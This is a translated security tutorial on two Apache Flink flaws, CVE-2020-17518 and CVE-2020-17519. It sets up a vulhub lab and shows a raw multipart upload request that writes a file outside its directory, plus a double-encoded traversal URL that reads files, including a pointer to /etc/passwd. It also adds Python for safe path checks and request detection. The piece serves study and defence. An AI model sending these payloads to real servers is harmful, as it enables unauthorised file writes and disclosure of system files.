2025-02-24 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com)05/31 Report--
This article shows how to analyze the Apache Flink file operation vulnerabilities CVE-2020-17518 and CVE-2020-17519. The content is concise and easy to follow; I hope the detailed walkthrough is useful to you.
0x00 Introduction
Apache Flink has been one of the most popular data processing engines of recent years. It is highly regarded by major vendors, has been deployed in real business scenarios, and is a common choice when companies evaluate stream processing frameworks. The core of Flink is a streaming dataflow execution engine, which provides data distribution, data communication and fault tolerance for distributed computation over data streams. On top of that execution engine, Flink offers a number of higher-level APIs for users to write distributed jobs.
0x01 Vulnerability overview
CVE-2020-17519
A change introduced in Apache Flink 1.11.0 (also present in 1.11.1 and 1.11.2) allows an attacker to read any file on the local file system of the JobManager through the REST interface of the JobManager process.
CVE-2020-17518
Apache Flink 1.5.1 introduced a REST handler that allows an uploaded file to be written to an arbitrary location on the local file system by way of a maliciously crafted HTTP header.
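Both issues come down to the same root cause: a file name taken from the request (the log file name in the URL path for CVE-2020-17519, the multipart filename for CVE-2020-17518) is joined to a server-side directory without confirming that the result stays inside that directory. The Python below is an added illustration, not Flink's own code. `naive_resolve` mirrors the vulnerable pattern, including decoding the name a second time after routing, which is why the reproduction section uses the double-encoded `..%252f` form; `safe_resolve` shows the check a handler should make. The directory paths are assumed for the example.

```python
import os
from urllib.parse import unquote

# Assumed directory layout for the example; real values depend on the deployment.
LOG_DIR = "/opt/flink/log"
UPLOAD_DIR = "/tmp/flink-web-upload"


class PathTraversalError(ValueError):
    """Raised when a request-supplied file name would escape its base directory."""


def decode_twice(name: str) -> str:
    # Mirrors a pipeline that URL-decodes once while routing and once again in the
    # handler, so "..%252f" reaches the file-system layer as "../".
    return unquote(unquote(name))


def naive_resolve(base_dir: str, requested: str) -> str:
    # Vulnerable pattern: join the decoded name to the base directory and use the result.
    # Nothing stops "../" segments from walking out of base_dir.
    return os.path.normpath(os.path.join(base_dir, decode_twice(requested)))


def safe_resolve(base_dir: str, requested: str) -> str:
    # Hardened pattern. A log file name or an uploaded jar name must be a bare name:
    # reject anything containing a separator or equal to "", "." or "..".
    name = decode_twice(requested)
    if name in ("", ".", "..") or os.path.basename(name) != name:
        raise PathTraversalError(f"rejected file name {requested!r}")
    # Second line of defence: resolve symlinks and confirm the target is still inside
    # the base directory (commonpath on normalized absolute paths).
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PathTraversalError(f"{target!r} escapes {base!r}")
    return target


def escapes_base(base_dir: str, requested: str) -> bool:
    # True when the hardened check rejects the name; useful for tests and for
    # re-checking names seen in request logs after the fact.
    try:
        safe_resolve(base_dir, requested)
    except PathTraversalError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: the two shapes from the reproduction section plus a benign name.
    samples = [
        (LOG_DIR, "..%252f..%252f..%252f..%252fetc%252fpasswd"),
        (UPLOAD_DIR, "../tmp/success"),
        (LOG_DIR, "flink-jobmanager.log"),
    ]
    for base, req in samples:
        print(f"{req!r}: naive -> {naive_resolve(base, req)}; rejected by safe_resolve: {escapes_base(base, req)}")
```

The first check alone stops both vulnerability classes, since neither endpoint has any legitimate reason to accept a path; the `realpath`/`commonpath` check is there in case the base directory itself contains a symlink pointing elsewhere.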
0x02 Affected versions
CVE-2020-17519: Flink 1.11.0, 1.11.1, 1.11.2
CVE-2020-17518: Flink 1.5.1 to 1.11.2
0x03 Environment setup
1. The vulnerable environment is built with vulhub's docker setup, which can be downloaded from:
https://github.com/vulhub/vulhub/
2. After downloading, copy it to a virtual machine that has docker and docker-compose installed, and enter the directory:
cd vulhub-master/flink/CVE-2020-17519/
3. Run docker-compose up -d to pull and start the environment. Because the CVE-2020-17519 environment ships Flink 1.11.2, this one environment is enough to reproduce both vulnerabilities. "done" in the output indicates the pull succeeded.
4. Open http://your-ip:8081 in the browser to view the dashboard.
0x04 Vulnerability reproduction
CVE-2020-17518 reproduction
1. First, use CVE-2020-17518 to write a file: on the home page, construct the following request and send it.
POST /jars/upload HTTP/1.1
Host: your-ip:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=-721072898
Content-Length: 149

---721072898
Content-Disposition: form-data; name="jarfile"; filename="../tmp/success"

Success
---721072898--
2. Although the response to the request above is HTTP 400, the file has been written inside the container. Enter the container to check.
CVE-2020-17519 reproduction
1. If you cannot enter the container after the write above, use CVE-2020-17519 to read files instead. Enter the following payload in the browser to view the file written to the tmp directory.
http://172.16.1.147:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess
2. Modify the payload to view the passwd file under /etc.
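For defenders, the two request shapes in this section are easy to recognise at a reverse proxy or WAF that records the request line and, for uploads, the multipart part headers. The following Python is an added example, not part of the original post or of Flink: it parses a raw HTTP request, decodes the target repeatedly so the double-encoded `..%252f` form is caught, and flags a `/jobmanager/logs/<name>` read or a `/jars/upload` multipart filename whenever the name contains a `..` segment. The three sample requests are constructed from the shapes shown above; the host name in them is made up.

```python
import re
from urllib.parse import unquote, urlsplit

# A ".." path segment, with either separator, after decoding.
DOTDOT_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
LOG_PREFIX = "/jobmanager/logs/"
UPLOAD_PATH = "/jars/upload"


def decode_fully(value: str, max_rounds: int = 3) -> str:
    # Decode until the string stops changing, so "..%252f" (double-encoded) and
    # "%2e%2e/" (encoded dots) both surface as "../".
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(name: str) -> bool:
    return DOTDOT_SEGMENT.search(decode_fully(name)) is not None


def parse_request(raw: str):
    # Minimal HTTP/1.1 request parser: request line, lower-cased header map, body.
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers, body


def multipart_filenames(headers: dict, body: str) -> list:
    # Pull every Content-Disposition filename out of a multipart/form-data body.
    match = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not match:
        return []
    delimiter = "--" + match.group(1)
    names = []
    for part in body.split(delimiter):
        found = re.search(r'filename="([^"]*)"', part)
        if found:
            names.append(found.group(1))
    return names


def analyze_request(raw: str) -> list:
    # Returns [(cve_id, detail), ...] for the two Flink request shapes; empty when clean.
    method, target, headers, body = parse_request(raw)
    path = urlsplit(target).path
    findings = []
    if path.startswith(LOG_PREFIX) and has_traversal(path[len(LOG_PREFIX):]):
        findings.append(("CVE-2020-17519", "traversal in log file name: " + decode_fully(path)))
    if method == "POST" and path == UPLOAD_PATH:
        for filename in multipart_filenames(headers, body):
            if has_traversal(filename):
                findings.append(("CVE-2020-17518", "traversal in upload filename: " + filename))
    return findings


# Constructed sample requests, modelled on the shapes shown in the reproduction section.
UPLOAD_REQUEST = "\r\n".join([
    "POST /jars/upload HTTP/1.1",
    "Host: jobmanager.example:8081",
    "Content-Type: multipart/form-data; boundary=-721072898",
    "",
    "---721072898",
    'Content-Disposition: form-data; name="jarfile"; filename="../tmp/success"',
    "",
    "success",
    "---721072898--",
    "",
])
LOG_READ_REQUEST = "\r\n".join([
    "GET /jobmanager/logs/..%252f..%252f..%252f..%252ftmp%252fsuccess HTTP/1.1",
    "Host: jobmanager.example:8081",
    "",
    "",
])
BENIGN_REQUEST = "\r\n".join([
    "GET /jobmanager/logs/flink--standalonesession-0-host.log HTTP/1.1",
    "Host: jobmanager.example:8081",
    "",
    "",
])

if __name__ == "__main__":
    for sample in (UPLOAD_REQUEST, LOG_READ_REQUEST, BENIGN_REQUEST):
        method, target = parse_request(sample)[:2]
        print(method, target, "->", analyze_request(sample) or "clean")
```

Matching after full decoding matters: a rule that looks for the literal string `../` in the URL misses the `%252f` request entirely, and one that decodes exactly once still sees `..%2f`. Only the upload check needs the body, so if the proxy logs just the request line, the CVE-2020-17518 side has to be detected at the WAF or on the host by watching the upload directory.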
0x05 Remediation
It is recommended to upgrade to a fixed version or to the latest release.
That covers how to analyze the Apache Flink file operation vulnerabilities CVE-2020-17518 and CVE-2020-17519. If you want to learn more, you are welcome to follow the industry information channel.